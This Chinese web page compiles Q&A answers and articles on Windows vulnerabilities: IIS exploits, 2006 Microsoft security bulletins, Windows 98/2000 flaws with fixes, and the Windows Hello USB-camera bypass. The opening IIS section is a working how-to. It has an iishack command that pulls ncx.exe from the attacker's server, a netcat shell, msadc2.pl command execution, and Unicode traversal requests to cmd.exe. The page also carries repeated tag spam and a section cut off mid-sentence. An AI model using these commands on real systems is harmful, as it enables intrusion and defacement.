本文目录一览:
- 1、常见的网络漏洞有哪些
- 2、蠕虫病毒利用的微软漏洞有哪些?最好能按时间顺序,谢谢了
- 3、系统漏洞是什么回事?
- 4、什么是windows系统漏洞?
- 5、Windows Hello 可绕过漏洞进行身份认证
常见的网络漏洞有哪些
你说的漏洞比较广,是软件漏洞还是系统 系统漏洞还有server漏洞还有iis漏洞 我就和你说说iis漏洞吧。1. iis4hack缓冲溢出
主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面 的站点去下载,另外你还需要一台自己的WEB服务器。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:
c:iishack.exe victim 80 your web server/ncx.exe
然后你就使用netcat来连接你要检测的服务器:
c:nc victim 80
如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。利用程序见iis4hack.zip
2.msadc
IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下, 它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。利用程序为msadc2.pl,我们看看它的help -windows著名的漏洞
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Usage: msadc.pl -h host { -d delay -X -v }
-h host = host you want to scan (ip or domain)
-d seconds = delay between calls, default 1 second
-X = dump Index Server path table, if available
-N = query VbBusObj for NetBIOS name
-V = use VbBusObj instead of ActiveDataFactory
-v = verbose
-e = external dictionary file for step 5
-u \hostsharefile = use UNC file
-w = Windows 95 instead of Windows NT
-c = v1 compatibility (three step query)
-s number = run only step number
Or a -R will resume a (v2) command session
[quack@chat quack]$ perl msadc2.pl -h
-- RDS smack v2 - rain forest puppy / ADM / wiretrip --
Type the command line you want to run (cmd /c assumed):
cmd /c
如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
echo hacked by me d:inetpubwwwrootvictimwebindex.htm
3.Codebrws.asp
察看文件源代码
4.Showcode.asp
察看文件源代码
5.Null.htw
察看文件源代码
;%20CiRestriction=none%20%20CiHiliteType=full
6.webhits.dll .htw
hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目: -windows著名的漏洞
如果你从服务器端获得如下信息:
format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消
这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)
一个攻击者可以使用如下的方法来访问系统中文件的内容:
?
ciwebhitsfile=/../../winnt/win.inicirestriction=nonecihilitetype=full
就会在有此漏洞系统中win.ini文件的内容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的内容,你可以请求如下的URL: 你就得到了源代码
8.ASP Dot Bug
在请求的URL结尾追加一个或者多个点导致泄露ASP源代码。
.
9.ISM.DLL
这个漏洞是由Cerberus Information Security team.最早发现的,它运行在IIS4.0和5.0上面,允许攻击者查看任意文件内容和源代码。通过在文件名后面追加近230个+或者?%20?(这些表示空格)并追加?.htr?的特殊请求给IIS,会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLL ISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL 程序把传递过来的文件打开和执行,但在ISM.DLL 截断信息之前,缓冲区发送 一个截断开的 .Htr 并会有一些时间去返回一些你要打开的文件内容. 除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经发送过一个 .htr 请求到机器上,那么这攻击会失效.它只能在 ISM.DLL第一次装入内存时工作.CNNS发现追加+号到没有一次攻击这个问题,可以进行多次攻击。 -windows著名的漏洞
(...=230)global.asa.htr
10. .idc .ida Bugs
这个漏洞实际上类似ASP dot 漏洞,其能在IIS4.0上显示其WEB目录信息,很奇怪的说有些还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida? 后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果此.idc不存在,它就返回一些信息给客户端。 -windows著名的漏洞
或者 anything.idq
11.+.htr Bug
对有些ASA和ASP追加+.htr的URL请求就会导致文件源代码的泄露:
12.NT Site Server Adsamples
通过请求site.csc,一般保存在/adsamples/config/site.csc中,攻击者 可能获得一些如数据库中的DSN,UID和PASS的一些信息,如:
13./iisadmpwd
IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号,就是你的WEB服务器是通过NAT来转换地址的,还可以被攻击。 每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd,这个目录包含多个 .htr文件,匿名用户允许访问这些文件,这些文件刚好没有规定只限制 在loopback addr(127.0.0.1),请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下: -windows著名的漏洞
c:winntsystem32inetsrviisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
这样,攻击者可以通过暴力来猜测你的密码。
14.Translate:f Bug
泄露asp文件源代码 存在OFFICE 2000和FRONTPAGE 2000Server Extensions中的WebDAV中, 当有人请求一个ASP/ASA后者其他任意脚本的时候在HTTP GET加上Translate:f 后缀,并在请求文件后面加/就会显示文件代码,当然在没有打WIN2K SP1补丁 为前提。这个是W2K的漏洞,但由于FP2000也安装在IIS4.0上,所以在IIS4.0上也有这个漏洞。利用程序: trasn1.pl,trans2.pl -windows著名的漏洞
15.Unicode
IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊 的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。 -windows著名的漏洞
可能需要察看以下几个目录
GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
GET
/cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.0rnrn
eeye开发了工具包iishack1.5针对这一漏洞进行测试
16.iis5.0 缓冲溢出
微软Win 2K IIS
5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系,缺省情况下该映射存在。当远程用户提交对.printer的URL请求时,IIS
5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查,远程用户可以提交一个精心构造的针对.printer的URL请求,其"Host:"域包含大约420字节的数据,此时在msw3prt.dll中发生典型的缓冲区溢出,潜在允许执行任意代码。溢出发生后,WEB服务停止响应,Win 2K可以检查到WEB服务停止响应,从而自动重启它,因此系统管理员很难意识到发生过攻击。利用程序见iis5hack.zip -windows著名的漏洞
17.IIS CGI文件名二次解码漏洞
IIS在加载可执行CGI程序时,会进行两次解码。第一次解码是对CGI文件名进行http解码,然后判断此文件名是否为可执行文件,例如检查后缀名是否为".exe"或".com"等等。在文件名检查通过之后,IIS会再进行第二次解码。正常情况下,应该只对该CGI的参数进行解码,然而,IIS错误地将已经解码过的CGI文件名和CGI参数一起进行解码。这样,CGI文件名就被错误地解码了两次。 -windows著名的漏洞
通过精心构造CGI文件名,攻击者可以绕过IIS对文件名所作的安全检查,例如对"../"或"./"的检查,在某些条件下,攻击者可以执行任意系统命令。
例如,对于’’这个字符,正常编码后是%5c。这三个字符对应的编码为:
’%’ = %25
’5’ = %35
’c’ = %63
如果要对这三个字符再做一次编码,就可以有多种形式,例如:
%255c
%%35c
%%35%63
%25%35%63
...
因此,".."就可以表示成"..%255c"或"..%%35c"等等形式。在经过第一次解码之后,变成"..%5c"。IIS会认为这是一个正常的字符串,不会违反安全规则检查。而在第二次被解码之后,就会变成".."。因此攻击者就可以使用".."来进行目录遍历,执行web目录之外的任意程序。 好了 先到这里。。。。漏洞太多了不过还是微软系统排第一的 一个是使用的人群广 一个是XXX 哈哈哈-windows著名的漏洞
蠕虫病毒利用的微软漏洞有哪些?最好能按时间顺序,谢谢了
有很多
此次的漏洞公告涵盖了21个漏洞,其中,12个漏洞被认为是关键或重要的;另外8个与IE浏览器有关。三个漏洞有可能导致蠕虫病毒的发生。影响路由和远程访问的 MS06-025漏洞可能会在Windows 2000和无认证的Windows XP SP1上爆发,从而以匿名的远程用户身份发送恶意流量。MS06-029可能会导致大量蠕虫病毒的爆发。-windows著名的漏洞
MS06-021:
IE的累积性安全更新
漏洞影响:远程执行代码
严重等级:严重
注意:此更新替代2006年2月28日发布的IE累积性更新。
受影响系统:
Windows 2000 SP4上的IE 5.01 SP4
Windows 2000 SP4或Windows XP SP1上的IE 6 SP1
Windows XP SP2上的IE 6
Windows Server 2003及其SP1上的IE 6
Windows Server 2003(Itanium)及SP1(Itanium)上的IE 6
Windows Server 2003 x64 Edition的IE 6
Windows XP Professional x64 Edition的IE 6
详细描述:
此更新可消除多个公开报告和秘密报告的新发现的漏洞。
其中包括异常处理内存损坏漏洞、HTML解码内存损坏漏洞、ActiveX控件内存损坏漏洞、COM对象实例化内存损坏漏洞、CSS跨域信息泄露漏洞、地址栏欺骗漏洞、MHT内存损坏漏洞、地址栏欺骗漏洞。
建议用户立即应用此更新。
MS06-022:
ART图像呈现中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:严重
受影响系统:
Windows XP SP1/SP2
Windows XP Professional x64 Edition
Windows Server 2003及SP1
Windows Server 2003(Itanium)及其SP1(Itanium)
Windows Server 2003 x64 Edition
Windows 98/98 SE/ME
详细描述:
Windows处理ART图像的方式中存在一个远程执行代码漏洞,攻击者可以通过构建特制的ART图像来利用此漏洞。如果用户访问了网站或查看了特制的电子邮件,此漏洞就可能允许远程执行代码。成功利用此漏洞的攻击者可以完全控制受影响的系统。-windows著名的漏洞
MS06-023:JScript中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:严重
受影响系统:
Windows 2000 SP4上的JScript 5.1/5.5/5.6
Windows XP SP1/SP2上的JScript 5.6
Windows XP Professional x64 Edition上的JScript 5.6
Windows Server 2003及其SP1上的JScript 5.6
Windows Server 2003(Itanium)及其SP1(Itanium)上的JScript 5.6
Windows Server 2003 x64 Edition上的JScript 5.6
Windows 98/98 SE/ME上的JScript 5.6
详细描述:
JScript中存在一个远程执行代码漏洞。攻击者可以通过构建特制的JScript来利用此漏洞,如果用户访问了网站或查看了特制的电子邮件,此漏洞就可能允许远程执行代码。成功利用此漏洞者可以完全控制受影响的系统。-windows著名的漏洞
MS06-024:
Windows Media Player中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:严重
受影响系统:
Windows XP SP1上的Media Player
Windows XP SP2 上的Media Player 9
Windows XP Professional x64 Edition上的Media Player 10
Windows Server 2003上的Media Player 9
Windows Server 2003 SP1 上的Media Player 10
Windows Server 2003 x64 Edition上的Media Player 10
Windows 2000 SP4上的Media Player 7.1
Windows 2000 SP4/XP SP1上的Media Player 9
Windows XP SP1/SP2上的Media Player 10
不受影响系统:
所有Windows操作系统上的Media Player 6.4
详细描述:
Windows Media Player由于其处理PNG图像的方式而存在一个远程执行代码漏洞。攻击者可能通过构建特制的Media Player内容来利用该漏洞。如果用户访问恶意网站或打开包含恶意内容的电子邮件,则可能允许远程执行代码。成功利用此漏洞者可以完全控制受影响的系统。-windows著名的漏洞
MS06-025:
路由和远程访问中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:严重
受影响系统:
Windows 2000 SP4
Windows XP SP1/SP2
Windows XP Professional x64 Edition
Windows Server 2003及SP1
Windows Server 2003(Itanium)及其SP1(Itanium)
Windows Server 2003 x64 Edition
不受影响系统:
Windows 98/98 SE/ME
详细描述:
Routing and Remote Access 服务中存在远程执行代码漏洞,成功利用此漏洞者可以完全控制受影响的系统。
MS06-026:
图形呈现引擎中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:严重
受影响系统:
Windows 98/98 SE/ME
不受影响系统:
Windows 2000 SP4
Windows XP SP1/SP2
Windows XP Professional x64 Edition
Windows Server 2003及SP1
Windows Server 2003(Itanium)及其SP1(Itanium)
Windows Server 2003 x64 Edition
详细描述:
图形呈现引擎中由于其处理Windows图元文件(WMF)图像的方式而存在一个远程执行代码漏洞。攻击者可以通过构建特制的WMF图像来利用此漏洞,如果用户访问了恶意网站或打开了电子邮件中特制的附件,此漏洞就可能允许远程执行代码。-windows著名的漏洞
成功利用此漏洞的攻击者可以完全控制受影响的系统。
MS06-027: Word 中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:严重
受影响系统:
Office 2000 SP3下的Word 2000、
Office XP SP3下的Word 2002
Office 2003 SP1/SP2下的Word 2003、Word Viewer 2003
Works Suites 2000/2001/ 2002/2003/2004/2005/2006
不受影响系统:
Word X for Mac
Word 2004 for Mac
详细描述:
使用格式错误的对象指针的Word中存在一个远程执行代码漏洞。攻击者可以通过构建特制的Word文件来利用此漏洞,此文件可能允许远程执行代码。
MS06-028:
PowerPoint中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:严重
受影响系统:
Office 2000 SP3下的PowerPoint 2000
Office XP SP3下的PowerPoint 2002
Office 2003 SP1/SP2下的PowerPoint 2003
Office 2004 for Mac下的PowerPoint 2004 for Mac
不受影响系统:
PowerPoint X for Mac
详细描述:
使用格式错误的记录的PowerPoint中存在一个远程执行代码漏洞。攻击者可以通过构建特制的PowerPoint文件来利用此漏洞,此文件可能允许远程执行代码。
MS06-029:
运行Outlook Web Access的Exchange Server中的漏洞可能允许脚本注入
漏洞影响:远程执行代码
严重等级:重要
受影响系统:
带有2004年8月的Exchange 2000 Server Post-SP3 更新汇总的Exchange 2000 Server SP3
Exchange Server 2003 SP1/SP2
详细描述:
运行Outlook Web Access (OWA)的Exchange Server中存在一个脚本注入漏洞。攻击者可能通过构建带有特制脚本的电子邮件来利用该漏洞。如果运行此特制脚本,该脚本将在客户端上用户的安全上下文中执行。要试图利用此漏洞,需要进行用户交互。-windows著名的漏洞
MS06-030:服务器消息块中的漏洞可能允许特权提升
漏洞影响:特权提升
严重等级:重要
受影响系统:
Windows 2000 SP4
Windows XP SP1/SP2
Windows XP Professional x64 Edition
Windows Server 2003及SP1
Windows Server 2003(Itanium)及其SP1(Itanium)
Windows Server 2003 x64 Edition
不受影响系统:
Windows 98/98 SE/ME
详细描述:
服务器消息块(SMB)中存在特权提升漏洞,成功利用此漏洞的攻击者可以完全控制受影响的系统。服务器消息块(SMB)中还存在一个拒绝服务漏洞,可能导致受影响的系统停止响应。
MS06-031:RPC相互身份验证中的漏洞可能允许欺骗
漏洞影响:欺骗
严重等级:中等
受影响系统:
Windows 2000 SP4
详细描述:
RPC处理相互身份验证的方式中存在一个欺骗漏洞。此漏洞可能允许攻击者诱使用户连接到看起来有效的恶意RPC服务器。
MS06-032:TCP/IP中的漏洞可能允许远程执行代码
漏洞影响:远程执行代码
严重等级:重要
受影响系统:
Windows 2000 SP4
Windows XP SP1/SP2
Windows XP Professional x64 Edition
Windows Server 2003及SP1
Windows Server 2003(Itanium)及其SP1(Itanium)
Windows Server 2003 x64 Edition
不受影响系统:
Windows 98/98 SE/ME
详细描述:
TCP/IP协议驱动程序中存在一个远程执行代码漏洞,成功利用此漏洞者可以完全控制受影响的系统。
参考资料:;categ_code=10011008
系统漏洞是什么回事?
1.系统漏洞简介
(1)什么是系统漏洞:
漏洞即某个程序(包括操作系统)在设计时未考虑周全,当程序遇到一个看似合理,但实际无法处理的问题时,引发的不可预见的错误。系统漏洞又称安全缺陷,对用户造成的不良后果如下所述:
如漏洞被恶意用户利用,会造成信息泄漏,如黑客攻击网站即利用网络服务器操作系统的漏洞。
对用户操作造成不便,如不明原因的死机和丢失文件等。
综上所述,仅有堵住系统漏洞,用户才会有一个安全和稳定的工作环境。
(2)为什么会存在漏洞:
漏洞的产生大致有三个原因,具体如下所述:
编程人员的人为因素,在程序编写过程,为实现不可告人的目的,在程序代码的隐蔽处保留后门。
受编程人员的能力、经验和当时安全技术所限,在程序中难免会有不足之处,轻则影响程序效率,重则导致非授权用户的权限提升。
由于硬件原因,使编程人员无法弥补硬件的漏洞,从而使硬件的问题通过软件表现。
当然,Windows漏洞层出不穷也有其客观原因,即任何事物都非十全十美,作为应用于桌面的操作系统——Windows也是如此,且由于其在桌面操作系统的垄断地位,使其存在的问题会很快暴露。此外和Linux等开放源码的操作系统相比,Windows属于暗箱操作,普通用户无法获取源代码,因此安全问题均由微软自身解决。 -windows著名的漏洞
2.如何检测Windows系统漏洞
用户应及时了解自身的Windows系统存在哪些已知漏洞,做到“防患于未然”。对于常见和较重大的系统漏洞,本文将会详细说明,同时建议用户通过专用软件对系统进行全面检测。
本文推荐使用的Windows系统检测工具为微软开发的Baseline Security Analyzer(基准安全分析器,简称MBSA。
Baseline Security Analyzer软件为免费软件,仅可运行于Windows 2000和Windows XP系统中,该软件可检测与系统相关的不正确安全设置并给出建议,官方下载网址为:。 -windows著名的漏洞
1.0 版本的 MBSA可对本地或远程的Windows 系统进行检测,检测内容包括为微软产品的漏洞及缺少的补丁,如Windows NT 4.0、Windows 2000、Windows XP、IIS、SQL Server、 Internet Explorer及办公软件Office 2000等,并可为每台检测过的计算机创建和保存独立的XML格式安全报告。 -windows著名的漏洞
3.如何处理系统中的漏洞
Windows操作系统的漏洞,某些由于软件设计失误而产生,另一些则由于用户设置不当所引发,均会严重影响系统安全。针对两种不同的错误需采用不同的方式加以解决,如下所述:
(1)针对设计错误,微软公司会及时推出补丁程序,用户只需及时下载并安装即可,因此建议用户经常浏览微软的安全公告,并及时下载补丁,官方网址为:。
(2)对于设置错误,则应及时修改配置,使系统更加安全可靠。
二、Windows 98系统漏洞
1.IGMP漏洞
漏洞描述:
IGMP漏洞是一个较有名且危险的系统漏洞,可使用户计算机中断网络连接或出现蓝屏和死机。
解释:
IGMP全称为Internet Group Management Protocol,即互联网组管理协议。目前有很多可发动IGMP攻击的工具,如Winnuke、Sping和Tardrop等,通过这些工具可向某个IP地址的100端口不断发送大量IGMP数据包,当被攻击的计算机收到数据包后,即无法对数据进行处理,从而导致TCP/IP崩溃,引起系统中断网络连接,出现蓝屏现象,重启系统才可解决该问题。此外如攻击者进行端口监听,还可对其他端口进行攻击。 -windows著名的漏洞
对策:
(1)下载相关的补丁程序,网址如下所述:
Windows 98第一版:;Windows 98第二版:
(2)为计算机安装防火墙系统,屏蔽IGMP数据。
2.系统文件检查器漏洞
漏洞描述:
运行系统文件检查工具检测系统后无法重新启动。
解释:
出现该问题的原因在于系统文件检查器检测系统时,向Windows 98系统提供了错误的系统文件放置信息,而这些错误信息导致检查器用错误文件替换系统中受损或丢失的Windows 98系统文件,从而导致死机、无法重启或无法登录。 -windows著名的漏洞
对策:
利用启动盘启动Windows 98,在DOS状态下运行“extract.exe”恢复被错误替换的系统文件。
3.共享密码校验漏洞
漏洞描述:
用户可任意访问Windows 98系统中的共享文件,即使共享目录已受口令保护,攻击者仍不需获取真实口令即可访问。
解释:
Windows 9x系统提供的文件和打印共享服务可设置口令保护,以避免非法用户访问。但微软的NetBIOS协议的口令校验机制存在严重漏洞,使保护形同虚设。
由于服务端对客户端口令进行校验时以客户端发送的数据长度为依据,因此客户端在发送口令认证数据包时可设置长度域为1, 同时发送一个字节的明文口令给服务端,服务端会将客户端发送的口令与服务端保存的共享口令的第一个字节进行明文比较,如匹配即认为通过验证。因此攻击者仅需猜测共享口令的第一个字节即可。 -windows著名的漏洞
Windows 98的远程管理也采用共享密码认证方式,因此也受该漏洞影响。
对策:
(1)下载并安装补丁程序,网址如下所述:
(2)在未获取并安装补丁程序前,建议暂时关闭文件共享服务。
4.共享访问客户端类型检测漏洞
漏洞描述:
恶意攻击者提供已修改的文件共享服务器,当Windows 98客户访问其共享资源时,会导致对客户的拒绝服务攻击。
解释:
当Windows 9x客户访问文件共享服务时,会比较服务端传送的驱动类型,如服务器返回服务类型并非实际的“?????”、“A:”、“LPT1:”、“COMM”、“IPC”五种类型中的一种,客户端会错误地获取并不存在的第6种类型,因此进行转换时会获取错误的驱动头指针,从而调用错误的驱动函数地址,造成客户端不稳定甚至崩溃。 -windows著名的漏洞
对策:
(1)不随意访问不可信主机的共享服务。
(2)禁止通过TCP/IP协议使用NetBIOS程序。
5.共享服务文件句柄漏洞
漏洞描述:
文件和打印共享服务程序存在安全漏洞,该漏洞允许恶意用户远程攻击Windows 98的文件共享服务,导致服务崩溃。
解释:
Windows 98系统的共享服务程序仅分配了有限的空间用于存储句柄转换指针,因此所能接收客户端的文件句柄范围为0至0x3ff(十六进制)。但服务程序在处理SMBfindclose等命令的时候,未正确检查客户端发送的文件句柄范围,因此可能获取错误的指针,导致非法访问错误的内存地址,多次重复攻击后会地址系统共享服务崩溃。 -windows著名的漏洞
对策:
取消TCP/IP协议中绑定的“文件和打印机共享”服务。
6.NetBIOS over TCP/IP耗尽资源漏洞
漏洞描述:
NetBIOS会由于一个远程漏洞而导致拒绝服务攻击,攻击者可通过连接NBT(NetBIOS over TCP/IP)端口而使系统耗尽网络资源并停止工作,甚至导致系统崩溃。
解释:
如攻击者对被攻击计算机初始化很多连接,然后关闭,使目标机的TCP始终处于FINWAIT-1状态,尽管最终将超时并释放,但攻击者可持续发送更多请求,初始化并关闭新连接,从而耗尽任何网络资源,最终导致NetBIOS拒绝正常服务。 -windows著名的漏洞
总而言之,DDOS攻击基本是无法解决的,从SYN FLOOD理论分析,仅需有限带宽的服务均会被攻击至拒绝服务,对服务器可能仅为拒绝服务,对一般计算机则会导致系统资源耗尽。
对策:
下载补丁程序,网址如下所述:
7.NetBIOS漏洞
漏洞描述:
该漏洞可泄漏计算机和工作组的名称,从而使入侵者按这些信息获取IP地址。此外该漏洞还可使对方访问计算机内的文件。
解释:
NetBIOS(NETwork Basic Input/Output System)是网络的基本输入/输出系统,是由IBM开发的网络标准,微软在此基础上继续开发,其客户机/服务器网络系统均基于NetBIOS,应用程序也通过标准的NetBIOS API调用,实现NetBIOS命令和数据在各种协议中传输,微软网络在Windows NT操作系统中利用NetBIOS完成大量的内部联网。 -windows著名的漏洞
虽然NetBIOS API为局域网开发,但目前已发展成为标准接口,无论在面向连接或非连接的通信中,应用程序均可使用其访问传输层联网协议。
NetBIOS接口为NetBEUI、NWLink、TCP/IP及其他协议而开发,由于这些协议均支持NetBIOS API,因此均提供建立会话和启动广播的功能。网络上的每台计算机均须唯一地与NetBIOS名等同,在建立会话或发送广播时也需使用该名字。当通过该名字使用NetBIOS会话时,发送方必须将NetBIOS名转化为IP地址。由于IP地址和名字均必为需,因此在进行成功通信前,所有名字转换方法必须提供正确的IP地址。 -windows著名的漏洞
NetBIOS是一个不可路由的协议,但可绑定至任意的协议中,因此其非常容易成为系统中的后门。
对策:
对于不需登录至NT/2000局域网的拨号用户,只需在系统的网络属性中删除“Microsoft网络用户”,而仅使用“Microsoft友好登陆”。
8.屏幕保护程序漏洞
漏洞描述:
不输入屏保密码即可访问硬盘,甚至运行程序。
解释:
当计算机使用的屏幕保护程序为Windows自带的“频道屏幕保护程序”后,在屏幕上单击鼠标右键或按键盘,出现屏保密码输入窗口后,用鼠标拖动输入框,使密码输入窗口的“取消”按钮位于在屏幕中央的图片上,然后将鼠标对准“取消”按钮,同时按下左右键,此时会弹出IE的右键菜单。 -windows著名的漏洞
在弹出的菜单中选择“图片另存为”,即弹出“保存图片”对话框,此时即可访问硬盘。
对策:
建议不使用Windows自带的“频道屏幕保护程序”。
三、Windows 2000系统漏洞
1.输入法漏洞
漏洞描述:
通过该漏洞用户可浏览计算机上的所有文件,且可执行net.exe命令添加Administrator级别的管理员用户,从而完全控制计算机。
解释:
在Windows 2000的登陆窗口中,按Ctrl+Shift键,切换至全拼输入法。在输入法状态条上按鼠标右键,选择“帮助”的
什么是windows系统漏洞?
Windows系统漏洞是指windows操作系统本身所存在的技术缺陷。系统漏洞往往会被病毒利用侵入并攻击用户计算机。Windows操作系统供应商将定期对已知的系统漏洞发布补丁程序,用户只要定期下载并安装补丁程序,可以保证计算机不会轻易被病毒入侵。-windows著名的漏洞
Windows Hello 可绕过漏洞进行身份认证
Windows 安全漏洞将允许攻击者欺骗用于系统生物特征面部识别方面的 USB 摄像头。
微软 Windows 10 无密码身份验证系统中的一个漏洞已被发现,攻击者可以利用该漏洞欺骗人脸图像以欺骗面部识别系统并控制设备。 【 网安资料 】
Windows Hello是Windows 10提供的一个新的安全功能,该功能通过生物识别技术为小伙伴们带来指纹、人脸和虹膜等多种身份验证方式,具有极高的安全性。只有具备特定的硬件设备才能使用Windows Hello功能。例如,指纹识别技术需要指纹收集器,人脸和虹膜识别技术需要Intel 3D RealSense摄像头或采用该技术并得到微软认证的同类设备。使用Windows Hello功能之前需要先启用PIN码,如果没有为当前登录系统的用户账户设置密码,那么需要在启用PIN码之前先为该账户创建密码。设置好PIN码后,如果已经为计算机安装好了Windows Hello所需的硬件设备,接下来可以通过设置向导来启用Windows Hello功能。成功启用Windows Hello后,小伙伴们将获得企业级别的安全性。以后只需通过快速轻扫手指或对着RealSense摄像头刷脸来登录Windows 10操作系统,而不再需要手动输入任何密码。据微软称,大约 85% 的 Windows 10 用户使用该系统。-windows著名的漏洞
CyberArk Labs 的研究人员早在 3 月份发现了该漏洞,并该漏洞命名为 CVE-2021-34466 ,并被评为重要严重性的Windows Hello漏洞。
根据 Microsoft 对安全漏洞的评估,未经身份验证的攻击者需要物理访问目标设备才能在高复杂性攻击中利用它。
攻击者利用这个漏洞可以继续操纵身份验证过程,方法是捕捉或重现目标的面部照片,然后插入定制的USB设备,将伪造的图像注入身份验证主机。
此外,该绕过漏洞的利用可以扩展到Windows Hello系统之外的任何认证系统,允许可插接的第三方USB摄像头作为生物识别传感器。
研究人员没有证据表明有人曾在野外尝试或使用过这种攻击,但有攻击动机的人可能会将其用于目标间谍受害者,比如研究人员、科学家、记者、活动家或设备上有敏感IP的特权用户。
微软在其 July Patch Tuesday update 中修复了该漏洞,该漏洞会影响该功能的消费者和商业版本。此外,Windows Hello 增强登录安全性(Windows 中的一项新安全功能需要专门的预装硬件、驱动程序和固件)的 Windows 用户可以免受任何“篡改生物识别管道”的攻击。然而,Tsarfati 表示,该解决方案可能无法完全缓解这个漏洞。-windows著名的漏洞
根据我们对缓解措施的初步测试,使用具有兼容硬件的增强登录安全性限制了攻击面,但依赖于拥有特定摄像头的用户,对于系统设计而言,对来自外围设备的输入的隐式信任仍然存在。为了更全面地缓解这种固有的信任问题,主机应该在信任生物特征认证设备之前验证它的完整性。-windows著名的漏洞
【 网安资料 】
CyberArk的研究人员发布了一段关于如何利用该漏洞的概念验证(PoC)的视频,该视频可用于消费者版本 Windows Hello 和名为 Windows Hello 企业版 (WHfB) 的企业版功能企业使用 ActiveDirectory。-windows著名的漏洞
绕过漏洞本身利用了 Windows Hello 生物识别传感器的一个漏洞,它“传输信息,操作系统……根据这些信息做出身份验证决定”。 因此,操纵这些信息可能导致绕过整个身份验证系统。
对于面部识别,生物识别传感器可以是嵌入在设备(如笔记本电脑)中的摄像头,也可以是通过 USB 连接到计算机的摄像头。因此,整个过程依赖于这个摄像头来证明身份,这就是漏洞所在,特别是当使用 USB 摄像头进行身份验证时。-windows著名的漏洞
问题就出在输入本身,在将信息输入系统之前,只有打字的人才知道键盘输入,而摄像头输入则不然。
因此,使用摄像头访问“公共”信息(即人脸)进行身份验证很容易被劫持。这类似于窃取密码,但由于数据(人脸)在那里,因此更容易访问。这个漏洞的核心在于,Windows Hello允许外部数据源作为信任的根源,而外部数据源可以被操纵。-windows著名的漏洞
【 网安资料 】
研究人员详细介绍了攻击者捕获某人图像、保存捕获的帧、冒充 USB 摄像头设备并最终将这些帧发送到 Windows hello 系统进行验证的稍微复杂的方法。
为了证明这一概念,他们使用 NXP 制造的评估板创建了一个自定义 USB 设备,该设备用作带有红外 (IR) 和红绿蓝 (RGB) 传感器的 USB 摄像头。他们使用这个自定义摄像头来传输目标人物的有效红外帧,同时发送卡通人物海绵宝宝的RGB帧图像。令研究人员惊讶的是,它奏效了。-windows著名的漏洞
基于这种原理,攻击者只需要实现一个支持 RGB 和 红外相机的 USB 摄像头,然后只发送受害者的一个真正的 IR 帧来绕过设备的登录阶段,而 RGB 帧可以包含任何随机图像。
整个过程依赖于攻击者拥有一个潜在受害者的红外帧,这可以通过捕获一个或将一个人的常规RBG帧转换为红外帧来实现
研究人员的研究结果表明,任何USB设备都可以被复制,而且任何USB设备都可以模仿其他USB设备。我们使用人的 IR 帧来绕过人脸识别机制。研究人员相信这些 IR 帧可以用常规的彩色图像创建出来。
